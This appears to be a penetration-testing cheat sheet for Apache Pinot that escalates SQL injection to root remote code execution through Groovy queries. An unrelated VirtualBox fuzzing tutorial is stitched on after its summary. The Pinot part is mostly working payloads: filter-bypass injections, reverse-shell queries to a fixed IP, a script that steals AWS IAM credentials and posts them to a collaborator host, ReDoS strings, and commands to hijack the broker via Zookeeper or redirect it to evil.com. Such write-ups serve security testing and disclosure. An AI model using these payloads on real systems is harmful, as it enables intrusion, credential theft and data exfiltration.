Apache Pinot SQLi and RCE Cheat Sheet

The database platform Apache Pinot has been growing in popularity. Let’s attack it!

This article will help pentesters use their familiarity with classic database systems such as Postgres and MariaDB, and apply it to Pinot. In this post, we will show how a classic SQL-injection (SQLi) bug in a Pinot-backed API can be escalated to Remote Code Execution (RCE) and then discuss post-exploitation.

What Is Pinot?

Pinot is a real-time distributed OLAP datastore, purpose-built to provide ultra low-latency analytics, even at extremely high throughput.

Huh? If it helps, most articles try to explain OLAP (OnLine Analytical Processing) by showing a diagram of your 2D database table turning into a cube, but for our purposes we can ignore all the jargon.

Apache Pinot is a database system which is tuned for analytics queries (Business Intelligence) where:

  • data is being streamed in, and needs to be instantly queryable
  • many users need to perform complicated queries at the same time
  • the queries need to quickly aggregate or filter terabytes of data

Apache Pinot Overview

Pinot was started in 2013 at LinkedIn, where it now

powers some of LinkedIn’s more recognisable experiences such as Who Viewed My Profile, Job, Publisher Analytics, […] Pinot also powers LinkedIn’s internal reporting platform…

Pinot is unlikely to be used for storing a fairly static table of user emails and password hashes. It is more likely to be found ingesting a stream of orders or user actions from Kafka for analysis via an internal dashboard. Takeaway delivery platform UberEats gives all restaurants access to a Pinot-powered dashboard which

enables the owner of a restaurant to get insights from Uber Eats orders regarding customer satisfaction, popular menu items, sales, and service quality analysis. Pinot enables slicing and dicing the raw data in different ways and supports low latency queries…

Essential Architectural Details

Pinot is written in Java.

Table data is partitioned / sharded into Segments, usually split based on timestamp, which can be stored in different places.

Apache Pinot is a cluster formed of different components, the essential ones being Controllers, Servers and Brokers.

Server

The Server stores segments of data. It receives SQL queries via GRPC, executes them and returns the results.

Broker

The Broker has an exposed HTTP port which clients send queries to. The Broker analyses the query and queries the Servers which have the required segments of data via GRPC. The client receives the results consolidated into a single response.

Controller

Maintains cluster metadata and manages other components. It serves admin endpoints and endpoints for uploading data.

Zookeeper

Apache Zookeeper is used to store cluster state and metadata. There may be multiple brokers, servers and controllers (LinkedIn claims to have more than 1000 nodes in a cluster), so Zookeeper is used to keep track of these nodes and which servers host which segments. Essentially it’s a hierarchical key-value store.

Setting Up a Test Environment

Following the Kubernetes quickstart in Minikube is an easy way to create a multi-node environment. The documentation walks through the steps to install the Pinot Helm chart, set up ingestion via Kafka, and expose port 9000 of the Controller to access the query editor and cluster management UI. If things break horrifically, you can just minikube delete to wipe everything and start again.

The only recommendations are to:

  • Set image.tag in kubernetes/helm/pinot/values.yaml to a specific Pinot release (e.g. release-0.10.0) rather than latest to test a specific version.
  • Install the Pinot chart from ./kubernetes/helm/pinot to use your local configuration changes rather than pinot/pinot which fetches values from the GitHub master branch.
  • Use stern -n pinot-quickstart pinot to tail logs from all nodes.

Pinot SQL Syntax & Injection Basics

While Pinot syntax is based on Apache Calcite, many features in the Calcite reference are unsupported in Pinot. Here are some useful language features which may help to identify and test a Pinot backend.

Strings

Strings are surrounded by single-quotes. Single-quotes can be escaped with another single-quote. Double quotes denote identifiers e.g. column names.

String concatenation

Performed by the 3-parameter function CONCAT(str1, str2, separator). The + sign only works with numbers.

SELECT "someColumn", 'a ''string'' with quotes', CONCAT('abc','efg','d') FROM myTable

Substrings

SUBSTR(col, startIndex, endIndex) where indexes start at 0 and can be negative to count from the end. This is different from Postgres and MySQL where the last parameter is a length.

SELECT SUBSTR('abcdef', -3, -1) FROM ignoreMe -- 'def'

Length

LENGTH(str)

Comments

Line comments -- do not require surrounding whitespace. Multiline comments /* */ raise an error if the closing */ is missing.

Filters

Basic WHERE filters need to reference a column. Filters which do not operate on any column will raise errors, so SQLi payloads such as ' OR ''=' will fail:

SELECT * FROM airlineStatsAvro
WHERE 1 = 1
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 1 should not be null.
-- Potentially invalid column name specified.
SELECT * FROM airlineStatsAvro
WHERE year(NOW()) > 0
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 2022 should not be null.
-- Potentially invalid column name specified.

As long as you know a valid column name, you can still return all records e.g.:

SELECT * FROM airlineStatsAvro
WHERE 0 = Year - Year AND ArrTimeBlk != 'blahblah-bc'

BETWEEN

SELECT * FROM transcript WHERE studentID between 201 and 300

IN

Use col IN (literal1, literal2, ...).

SELECT * FROM transcript WHERE UPPER(firstName) IN ('NICK','LUCY')

String Matching

In LIKE filters, % and _ are converted to the regular expression patterns .* and . respectively.

The REGEXP_LIKE(col, regex) function uses a java.util.regex.Pattern case-insensitive regular expression.

WHERE REGEXP_LIKE(alphabet, '^a[Bcd]+.*z$')

Both methods are vulnerable to Denial of Service (DoS) if users can provide their own unsanitised search queries e.g.:

  • LIKE '%%%%%%%%%%%%%zz'
  • REGEXP_LIKE(col, '((((((.*)*)*)*)*)*)*zz')

These filters will run on the Pinot server at close to 100% CPU forever (OK, for a very very long time depending on the data in the column).

UNION

No.

Stacked / Batched Queries

Nope.

JOIN

Limited support for joins is in development. Currently it is possible to join with offline tables with the lookUp function.

Subqueries

Limited support. The subquery is supposed to return a base64-encoded IdSet. An IdSet is a data structure (compressed bitmap or Bloom filter) where it is very fast to check if an Id belongs in the IdSet. The IN_SUBQUERY (filtered on Broker) or IN_PARTITIONED_SUBQUERY (filtered on Server) functions perform the subquery and then use this IdSet to filter results from the main query.

WHERE IN_SUBQUERY(
  yearID,
  'SELECT ID_SET(yearID) FROM baseballStats WHERE teamID = ''BC'''
  ) = 1

Database Version

It is common to SELECT @@VERSION or SELECT VERSION() when fingerprinting database servers. Pinot lacks this feature. Instead, the presence or absence of functions and other language features must be used to identify a Pinot server version.

Information Schema Tables

No.

Data Types

Some Pinot functions are sensitive to the column types in use (INT, LONG, BYTES, STRING, FLOAT, DOUBLE). The hash functions like SHA512, for instance, will only operate on BYTES columns and not STRING columns. Luckily, we can find the undocumented toUtf8 function in the source code and convert strings into bytes:

SELECT md5(toUtf8(somestring)) FROM table

CASE

Simple case:

SELECT
  CASE firstName WHEN 'Lucy' THEN 1 WHEN 'Bob', 'Nick' THEN 2 ELSE 'x' END
FROM transcript

Searched case:

SELECT
  CASE WHEN firstName = 'Lucy' THEN 1 WHEN firstName = 'Bob' THEN 2.1 ELSE 'x' END
FROM transcript

Query Options

Certain query options such as timeouts can be added with OPTION(key=value,key2=value2). Strangely enough, this can be added anywhere inside the query, and I mean anywhere!

SELECT studentID, firstOPTION(timeoutMs=1)Name
froOPTION(timeoutMs=1)m tranOPTION(timeoutMs=2)script
WHERE firstName OPTION(timeoutMs=1000) = 'Lucy'
-- succeeds as the final timeoutMs is long (1000ms)

SELECT * FROM transcript WHERE REGEXP_LIKE(firstName, 'LuOPTION(timeoutMs=1)cy')
-- BrokerTimeoutError:
-- Query timed out (time spent: 4ms, timeout: 1ms) for table: transcript_OFFLINE before scattering the request
--
-- With timeout 10ms, the error is:
-- 427: 1 servers [pinot-server-0_O] not responded
--
-- With an even larger timeout value the query succeeds and returns results for 'Lucy'.

Yes, even inside strings!

In a Pinot-backed search API, queries for thingumajig and thinguOPTION(a=b)majig should return identical results, assuming the characters ()= are not filtered by the API.

This is also potentially a useful WAF bypass.

[Image: "They're the same picture" meme]

CTF-grade SQL injection

In far-fetched scenarios, this could be used to comment out parts of a SQL query, e.g. a route /getFiles?category=)&title=%25oPtIoN( using a prepared statement to produce the SQL:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%oPtIoN('
  and topSecret = false
  and category LIKE ')'

Everything between OPTION( and the next ) is stripped out using regex /option\s*\([^)]+\)/i. The query gets executed as:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%'

allowing access to all the top secret files!

Note that the error "OPTION statement requires two parts separated by '='" occurs if there is the wrong number of equals signs inside the OPTION().
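The stripping step can be reproduced offline to check a payload before sending it. The following is a minimal sketch in Python that applies the regex quoted above to the example query. It only emulates that one pattern and is not Pinot's actual parsing code. It also does not model the equals-sign check, and the name strip_options is made up for illustration.

```python
import re

# The pattern quoted above, translated to Python syntax. This emulates the
# described behaviour only; it is not taken from the Pinot source.
OPTION_RE = re.compile(r"option\s*\([^)]+\)", re.IGNORECASE)


def strip_options(sql: str) -> str:
    """Remove every OPTION(...) span, the way the quoted regex would."""
    return OPTION_RE.sub("", sql)


query = (
    "SELECT * FROM gchqFiles\n"
    "WHERE\n"
    "  title LIKE '%oPtIoN('\n"
    "  and topSecret = false\n"
    "  and category LIKE ')'"
)

stripped = strip_options(query)
print(stripped)
```

Because the negated character class [^)] also matches newlines, the match runs across all three filter lines, which is why the topSecret condition disappears.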

Another contrived scenario could result in SQLi and a filter bypass.

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, 'oPtIoN(a=b')
  and not topSecret
  and category = ') OR id - id = 0--'

will be processed as

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, '
  and not topSecret
  and category = ') OR id - id = 0

Timeouts

Timeouts do not work. While the Broker returns a timeout exception to the client when the query timeout is reached, the Server continues processing the query row by row until completion, however long that takes. There is no way to cancel an in-progress query besides killing the Server process.

SQL Injection in Pinot

To proceed, you’ll need a SQL injection vulnerability, as with any type of database backend: malicious user input must be able to wind up in the query body rather than being sent as parameters with prepared statements.

Pinot backends do not support prepared statements, but the Java client has a PreparedStatement class which escapes single quotes before sending the request to the Broker and can prevent SQLi (except the OPTION() variety).

Injection may appear in a search query such as:

query = """SELECT order_id, order_details_json FROM orders
WHERE store_id IN ({stores})
  AND REGEXP_LIKE(product_name,'{query}')
  AND refunded = false""".format(
    stores=user.stores,
    query=request.query,
)

The query parameter can be abused for SQL injection to return all orders in the system without the restriction to specific store IDs. An example payload is !xyz') OR store_id - store_id = 0 OR (product_name = 'abc! which will produce the following SQL query:

SELECT order_id, order_details_json FROM orders
WHERE store_id IN (12, 34, 56)
  AND REGEXP_LIKE(product_name,'!xyz') OR store_id - store_id = 0 OR (product_name = 'abc!')
  AND refunded = false

The logical split happens on the OR, so records will be returned if either:

  • store_id IN (12, 34, 56) AND REGEXP_LIKE(product_name,'!xyz') (unlikely to have any results)
  • store_id - store_id = 0 (always true, so all records are returned)
  • (product_name = 'abc!') AND refunded = false (unlikely to have any results)

If the query template used by the target has no new lines, the query can alternatively be ended with a line comment !xyz') OR store_id - store_id = 0--.
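To make the injection concrete, here is a minimal runnable sketch of the vulnerable template in Python, fed with the payload above. The function names build_query and escape_literal are ours for illustration. The escaping helper simply doubles single quotes, as described in the Strings section, and is not the Java client's actual implementation.

```python
def build_query(stores, query):
    """Vulnerable: user input is pasted straight into the SQL text."""
    template = (
        "SELECT order_id, order_details_json FROM orders\n"
        "WHERE store_id IN ({stores})\n"
        "  AND REGEXP_LIKE(product_name,'{query}')\n"
        "  AND refunded = false"
    )
    return template.format(stores=", ".join(str(s) for s in stores), query=query)


def escape_literal(value):
    """Double single quotes so the value stays inside its string literal."""
    return value.replace("'", "''")


payload = "!xyz') OR store_id - store_id = 0 OR (product_name = 'abc!"

injected = build_query([12, 34, 56], payload)
escaped = build_query([12, 34, 56], escape_literal(payload))
print(injected)
print(escaped)
```

The first query breaks out of the string literal. The second keeps the whole payload inside it, although quote escaping alone would not stop the OPTION() trick.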

RCE via Groovy

While maturity is bringing improvements, secure design has not always been a priority. Pinot trusts anyone who can query the database to also execute code on the Server, as root 😲. This gaping security hole, officially a feature, is enabled by default in all released versions of Apache Pinot. It was disabled by default in a commit on May 17, 2022 but this commit has not yet made it into a release.

Scripts are written in the Groovy language. This is a JVM-based language, allowing you to use all your favourite Java methods. Here’s some Groovy syntax you might care about:

// print to Server log (only going to be useful when testing locally)
println 3
// make a variable
def data = 'abc'
// interpolation by using double quotes and $ARG or ${ARG}
def moredata = "${data}def"  // abcdef
// execute shell command, wait for completion and then return stdout
'whoami'.execute().text
// launch shell command, but do not wait for completion
"touch /tmp/$arg0".execute()
// execute shell command with array syntax, helps avoid quote-escaping hell
["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/53 0>&1 &"].execute()
// a semicolon must be placed after the final closing bracket of an if-else block
if (true) { a() } else { b() }; return "a"

To execute Groovy, use:

GROOVY(
  '{"returnType":"INT or STRING or some other data type","isSingleValue":true}',
  'groovy code on one line',
  MaybeAColumnName,
  MaybeAnotherColumnName
)

If columns (or transform functions) are specified after the groovy code, they appear as variables arg0, arg1, etc. in the Groovy script.
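Getting the quoting right is the fiddly part, since both the metadata JSON and the script sit inside single-quoted SQL strings. As a rough sketch, a small Python helper can assemble the expression and double any embedded single quotes. The helper names sql_literal and groovy_call are hypothetical and not part of any Pinot client.

```python
import json


def sql_literal(text):
    """Wrap text in single quotes, doubling any embedded single quotes."""
    return "'" + text.replace("'", "''") + "'"


def groovy_call(script, return_type="INT", columns=()):
    """Build a GROOVY(...) expression; columns show up as arg0, arg1, ... in the script."""
    metadata = json.dumps(
        {"returnType": return_type, "isSingleValue": True},
        separators=(",", ":"),
    )
    parts = [sql_literal(metadata), sql_literal(script), *columns]
    return "GROOVY(" + ", ".join(parts) + ")"


expr = groovy_call('println "hello $arg0"; 42', columns=["id"])
print(expr)
```

Sticking to double quotes inside the Groovy code, as the examples here do, keeps the SQL string free of doubled single quotes.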

RCE Example Queries

Whoami

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "whoami".execute().text; return 1'
) = 1 limit 5

Prints root to the log! The official Pinot docker images run Groovy scripts as root.

Note that:

  1. The Groovy function is an exception to the earlier rule requiring filters to include a column name.
  2. Even though the limit is 5, every row in each segment being searched is processed. Once 5 rows are reached, the query returns results to the Broker, but the root lines continue being printed to the log.
  3. The return and comparison values need not be the same. However the types must match returnType in the metadata JSON (here INT).
  4. The return keyword is optional for the final statement, so the script could end with ; 1.

Column values can also be passed to the script, here the id column as arg0:

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "hello $arg0"; "touch /tmp/id-$arg0".execute(); 42',
  id
) = 3

In /tmp, expect root-owned files id-1, id-2, id-3, etc. for each row.

AWS

Steal temporary AWS IAM credentials from pinot-server.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'def aws = "169.254.169.254/latest/meta-data/iam/security-credentials/";',
    'def collab = "xyz.burpcollaborator.net/";',
''),'def role = "curl -s ${aws}".execute().text.split("\n")[0].trim();',
''),'def creds = "curl -s ${aws}${role}".execute().text;',
''),'["curl", collab, "--data", creds].execute(); 0',
  '')
) = 1

These credentials could give access to cloud resources like S3. The code can of course be adapted to work with IMDSv2.

Reverse Shell

The goal is really to have a root shell from which to explore the cluster at your leisure without your commands appearing in query logs. You can use the following:

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/443 0>&1 &"].execute(); return 1'
) = 1

to spawn loads of reverse shells at the same time, one per row.

root@pinot-server-1:/opt/pinot#

You will be root on whichever Server instances are chosen by the broker based on which Servers contain the required table segments for the query.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"STRING","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute().text'
) = 'x'

This launches one reverse shell. If you accidentally kill the shell, however far into the future, a new reverse shell attempt will be spawned as the Server processes the next row. Yes, the client and Broker will see the query timeout, but the Server will continue executing the query until completion.

Tuning

When coming across Pinot for the first time on an engagement, we used a Groovy query similar to the AWS one above. However, as you can already guess, this launched tens of thousands of requests at Burp Collaborator over a span of several hours with no way to stop the runaway query besides confessing our sin to the client.

To avoid spawning thousands of processes and causing performance degradation and potentially a Denial of Service, limit execution to a single row with an if statement in Groovy.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'if (arg0 == "489") {',
    '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute();',
''),'return 1;',
''),'};',
''),'return 0',
  ''),
  id
) = 1

A reverse shell is spawned only for the one row with id 489.
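The nested CONCAT calls in the queries above look like a way to keep a one-line Groovy script readable by splitting it into fragments joined with an empty separator. Writing that nesting by hand is error-prone, so here is a minimal Python sketch that folds a list of fragments into the same shape. The helper names sql_literal and nested_concat are ours, and the script is a harmless stand-in for the payload.

```python
def sql_literal(text):
    """Wrap text in single quotes, doubling any embedded single quotes."""
    return "'" + text.replace("'", "''") + "'"


def nested_concat(fragments):
    """Fold script fragments into nested CONCAT(a, b, '') calls."""
    if not fragments:
        raise ValueError("need at least one fragment")
    expr = sql_literal(fragments[0])
    for fragment in fragments[1:]:
        # Pinot's CONCAT takes (str1, str2, separator); '' joins without a gap.
        expr = "CONCAT(" + expr + ", " + sql_literal(fragment) + ", '')"
    return expr


# Harmless stand-in script guarded to run for a single row only.
fragments = [
    'if (arg0 == "489") {',
    'println "only once";',
    'return 1;',
    '};',
    'return 0',
]

expr = nested_concat(fragments)
print(expr)
```

Five fragments produce four nested CONCAT calls, matching the layout of the hand-written queries.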

Use RCE on Server to Attack Other Nodes

We have root access to a Server via our reverse shell, giving us access to:

  • All the segment data stored on the Server
  • Configuration and environment variables with the locations of other services such as Broker and Zookeeper
  • Potentially keys to the cloud environment with juicy IAM permissions

As we’re root here already, let’s try to use our foothold to affect other parts of the Pinot cluster such as Zookeeper, Brokers, Controllers, and other Servers.

First we should check the configuration.

root@pinot-server-1:/opt/pinot# cat /proc/1/cmdline | sed 's/\x00/ /g'
/usr/local/openjdk-11/bin/java -Xms512M ... -Xlog:gc*:file=/opt/pinot/gc-pinot-server.log -Dlog4j2.configurationFile=/opt/pinot/conf/log4j2.xml -Dplugins.dir=/opt/pinot/plugins -Dplugins.dir=/opt/pinot/plugins -classpath /opt/pinot/lib/*:...:/opt/pinot/plugins/pinot-file-system/pinot-s3/pinot-s3-0.10.0-SNAPSHOT-shaded.jar -Dapp.name=pinot-admin -Dapp.pid=1 -Dapp.repo=/opt/pinot/lib -Dapp.home=/opt/pinot -Dbasedir=/opt/pinot org.apache.pinot.tools.admin.PinotAdministrator StartServer -clusterName pinot -zkAddress pinot-zookeeper:2181 -configFileName /var/pinot/server/config/pinot-server.conf

We have a Zookeeper address -zkAddress pinot-zookeeper:2181 and config file location -configFileName /var/pinot/server/config/pinot-server.conf. The file contains data locations and auth tokens in the unlikely event that internal cluster authentication has been enabled.

Zookeeper

It is likely that the locations of other services are available as environment variables; however, the source of truth is Zookeeper. Nodes must be able to read and write to Zookeeper to update their status.

root@pinot-server-1:/opt/pinot# cd /tmp
root@pinot-server-1:/tmp# wget -q https://dlcdn.apache.org/zookeeper/zookeeper-3.8.0/apache-zookeeper-3.8.0-bin.tar.gz && tar xzf apache-zookeeper-3.8.0-bin.tar.gz
root@pinot-server-1:/tmp# ./apache-zookeeper-3.8.0-bin/bin/zkCli.sh -server pinot-zookeeper:2181
Connecting to pinot-zookeeper:2181
...
2022-06-06 20:53:52,385 [myid:pinot-zookeeper:2181] - INFO  [main-SendThread(pinot-zookeeper:2181):o.a.z.ClientCnxn$SendThread@1444] - Session establishment complete on server pinot-zookeeper/10.103.140.149:2181, session id = 0x10000046bac0016, negotiated timeout = 30000
...
[zk: pinot-zookeeper:2181(CONNECTED) 0] ls /pinot/CONFIGS/PARTICIPANT
[Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099, Controller_pinot-controller-0.pinot-controller-headless.pinot-quickstart.svc.cluster.local_9000, Minion_pinot-minion-0.pinot-minion-headless.pinot-quickstart.svc.cluster.local_9514, Server_pinot-server-0.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098, Server_pinot-server-1.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098]

Now we have the list of “participants” in our Pinot cluster. We can get the configuration of a Broker:

[zk: pinot-zookeeper:2181(CONNECTED) 1] get /pinot/CONFIGS/PARTICIPANT/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099
{
  "id" : "Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099",
  "simpleFields" : {
    "HELIX_ENABLED" : "true",
    "HELIX_ENABLED_TIMESTAMP" : "1654547467392",
    "HELIX_HOST" : "pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local",
    "HELIX_PORT" : "8099"
  },
  "mapFields" : { },
  "listFields" : {
    "TAG_LIST" : [ "DefaultTenant_BROKER" ]
  }
}

By modifying the broker HELIX_HOST in Zookeeper (using set), Pinot queries will be sent via HTTP POST to /query/sql on a machine you control rather than the real broker. You can then reply with your own results. While powerful, this is a rather disruptive attack.

In further mitigation, it will not affect services which send requests directly to a hardcoded Broker address. Many clients do rely on Zookeeper or the Controller to locate the broker, and these clients will be affected. We have not investigated whether intra-cluster mutual TLS would downgrade this attack to DoS.

Broker

We discovered the location of the broker. Its HELIX_PORT refers to an HTTP server used for submitting SQL queries:

curl -H "Content-Type: application/json" -X POST \
   -d '{"sql":"SELECT X FROM Y"}' \
   http://pinot-broker-0:8099/query/sql

Sending queries directly to the broker may be much easier than via the SQLi endpoint. Note that the broker may have basic auth enabled, but as with all Pinot services it is disabled by default.
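If curl is not available on the compromised host, the same request can be put together with Python's standard library. This is a sketch under the assumptions of the curl example above: same hostname, port and /query/sql path, and no authentication. The function name build_broker_request is ours. The request is only built here, and the lines that would actually send it are left commented out.

```python
import json
import urllib.request


def build_broker_request(broker_url, sql):
    """Build (but do not send) a POST to the Broker's /query/sql endpoint."""
    body = json.dumps({"sql": sql}).encode("utf-8")
    return urllib.request.Request(
        broker_url.rstrip("/") + "/query/sql",
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


request = build_broker_request("http://pinot-broker-0:8099", "SELECT X FROM Y")
print(request.get_method(), request.full_url)

# To actually send it (needs network access to the Broker, and assumes the
# reply is JSON):
# with urllib.request.urlopen(request, timeout=10) as response:
#     print(json.load(response))
```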

All Pinot REST services also have an /appconfigs endpoint returning configuration, environment variables and Java versions.

Other Servers

There may be data which is only present on other Servers. From your reverse shell, SQL queries can be sent to any other Server via GRPC without requiring authentication.

Alternatively, we can go back and use Pinot’s IdSet subquery functionality to get shells on other Servers. We do this by injecting an IN_SUBQUERY(columnName, subQuery) filter into our original query to tableA to produce SQL like:

SELECT * FROM tableA
  WHERE
    IN_SUBQUERY(
      'x',
      'SELECT ID_SET(firstName) FROM tableB WHERE groovy(''{"returnType":"INT","isSingleValue":true}'',''println "RCE";return 3'', studentID)=3'
    ) = true

It is important that the tableA column name (here the literal 'x') and the ID_SET column of the subquery have the same type. If an integer column from tableB is used instead of firstName, the 'x' must be replaced with an integer.

We now get RCE on the Servers holding segments of tableB.

Controller

The Controller also has a useful REST API.

It has methods for getting and setting data such as cluster configuration, table schemas, instance information and segment data.

It can be used to interact with Zookeeper, e.g. to update the broker host as was done directly via Zookeeper above.

curl -X PUT "http://localhost:9000/instances/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099?updateBrokerResource=true" -H  "accept: application/json" -H  "Content-Type: application/json" -d "{  \"instanceName\": \"Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099\",  \"host\": \"evil.com\",  \"enabled\": true,  \"port\": \"8099\",  \"tags\": [\"DefaultTenant_BROKER\"],  \"type\":\"BROKER\",  \"pools\": null,  \"grpcPort\": -1,  \"adminPort\": -1,  \"systemResourceInfo\": null}"

Files can also be uploaded for ingestion into tables.

TLDR

  • Pinot is a modern database platform that can be attacked with old-school SQLi
  • SQL injection leads to Remote Code Execution by default in the latest release, at the time of writing
  • In the official container images, RCE means root on the Server component of the Pinot cluster
  • From here, other components can be affected to a certain degree
  • WTF is going on with OPTION()?
  • Pinot is under active development. Maturity will bring security improvements
  • In an upcoming release (>0.10.0) the SQLi to RCE footgun will be opt-in

Introduction to VirtualBox security research

Introduction

This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components.

We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball instead.

In our setup, we use Ubuntu 20.04.3 LTS. As the VT-x/AMD-V feature is not fully supported for VirtualBox, we use a native host. When using a MacBook, the following guide enables a Linux installation to an external SSD.

VirtualBox uses the kBuild framework for building. As mentioned on their page, only a few (0.5) people on our planet understand it, but editing makefiles should be straightforward. As we will see later, after commenting out hardware-specific components, that’s indeed true.

kmk is a kBuild alternative for the make subsystem. It allows creating debug or release builds, depending on the supplied arguments. The debug build provides a robust logging mechanism, which we will describe next.

Note that in this article, we will use three different builds: the debug build, and two release builds for fuzzing and coverage reporting. Because the release builds involve modifying the source code, we use a separate directory for every instance.

Debug Build

The build instructions for Linux are described here. After installing all required dependencies, it’s enough to run the following commands:

$ ./configure --disable-hardening --disable-docs
$ source ./env.sh && kmk KBUILD_TYPE=debug

If successful, the VirtualBox binary will be created at out/linux.amd64/debug/bin/VirtualBox. Before creating our first guest machine, we have to compile and load the kernel modules:

$ VERSION=6.1.30
$ vbox_dir=~/VirtualBox-$VERSION-debug/
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxdrv && sudo make && sudo insmod vboxdrv.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetflt && sudo make && sudo insmod vboxnetflt.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetadp && sudo make && sudo insmod vboxnetadp.ko)

VirtualBox defines the VBOXLOGGROUP enum inside include/VBox/log.h, which allows selectively enabling the logging of specific files or functionalities. Unfortunately, since the logging is intended for the debug builds, we could not enable this functionality in the release build without making many cumbersome changes.

Unlike the VirtualBox binary, the VBoxHeadless startup utility located in the same directory allows running the machines directly from the command-line interface. For illustration, we want to enable debugging for both this component and the PCNet network driver. First, we have to identify the entries of the VBOXLOGGROUP. They are defined using the LOG_GROUP_ string near the beginning of the file we wish to trace:

$ grep LOG_GROUP_ src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp src/VBox/Devices/Network/DevPCNet.cpp

src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI
src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET

We redirect the output to the terminal instead of creating log files and specify the Log Group name, using the lowercased string from the grep output and without the prefix:

$ export VBOX_LOG_DEST="nofile stdout"
$ VBOX_LOG="+gui.e.l.f+dev_pcnet.e.l.f.l2" out/linux.amd64/debug/bin/VBoxHeadless -startvm vm-test

The VirtualBox logging facility and the meaning of all parameters are clarified here. The output is easy to grep, and it’s crucial for understanding the internal structures.
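The naming rule above (drop the LOG_GROUP_ prefix, lowercase the rest, then append the flags) is easy to get wrong by hand when tracing several components. Here is a small Python sketch of it. The helper names group_name and vbox_log are ours, and the flag lists are simply the ones used in the command above.

```python
def group_name(define):
    """LOG_GROUP_DEV_PCNET -> dev_pcnet (drop the prefix, lowercase the rest)."""
    prefix = "LOG_GROUP_"
    if not define.startswith(prefix):
        raise ValueError(f"not a log group define: {define}")
    return define[len(prefix):].lower()


def vbox_log(groups):
    """Build a VBOX_LOG value from a {define: [flags...]} mapping."""
    return "".join(
        "+" + ".".join([group_name(define), *flags])
        for define, flags in groups.items()
    )


value = vbox_log({
    "LOG_GROUP_GUI": ["e", "l", "f"],
    "LOG_GROUP_DEV_PCNET": ["e", "l", "f", "l2"],
})
print(value)
```

The printed value can be assigned to VBOX_LOG exactly as in the VBoxHeadless command above.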

AFL instrumentation for afl-clang-fast / afl-clang-fast++

Installing Clang

For Ubuntu, we can follow the official instructions to install the Clang compiler. We used clang-12, because building was not possible with the previous version. Alternatively, clang-13 is supported too. After we are done, it is useful to verify the installation and create symlinks to ensure AFLplusplus will not complain about missing locations:

$ rehash
$ clang --version
$ clang++ --version
$ llvm-config --version
$ llvm-ar --version

$ sudo ln -sf /usr/bin/llvm-config-12 /usr/bin/llvm-config
$ sudo ln -sf /usr/bin/clang++-12 /usr/bin/clang++
$ sudo ln -sf /usr/bin/clang-12 /usr/bin/clang
$ sudo ln -sf /usr/bin/llvm-ar-12 /usr/bin/llvm-ar

Building AFLplusplus (AFL++)

Our fuzzer of choice was AFL++, although everything can be trivially reproduced with libFuzzer too. Since we don’t need the black box instrumentation, it’s enough to include the source-only parts:

$ git clone https://github.com/AFLplusplus/AFLplusplus
$ cd AFLplusplus

# use this revision if the VirtualBox compilation fails
$ git checkout 66ca8618ea3ae1506c96a38ef41b5f04387ab560

$ make source-only
$ sudo make install

Applying patches

To use clang for fuzzing, it’s necessary to create a new template kBuild/tools/AFL.kmk by using the vbox-fuzz/AFL.kmk file, available on https://github.com/doyensec/vbox-fuzz.

Moreover, we have to fix multiple issues related to undefined symbols or different comment styles. The most important change is disabling the instrumentation for Ring-0 components (TEMPLATE_VBoxR0_TOOL). Otherwise it’s not possible to boot the guest machine. All these changes are included in the patch files.

Interestingly, when I was investigating the error message I obtained during the failed compilation, I found some recent slides from the HITB conference describing exactly the same issue. This was a confirmation that I was on the right track, and more people were trying the same approach. The slides also mention VBoxHeadless, a natural choice for a harness, which we used too.

If the unmodified VirtualBox is located inside the ~/VirtualBox-6.1.30-release-afl directory, we run these commands to apply all necessary patches:

$ TO_PATCH=6.1.30
$ SRC_PATCH=6.1.30
$ cd ~/VirtualBox-$TO_PATCH-release-afl

$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/Config.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/undefined_xfree86.patch
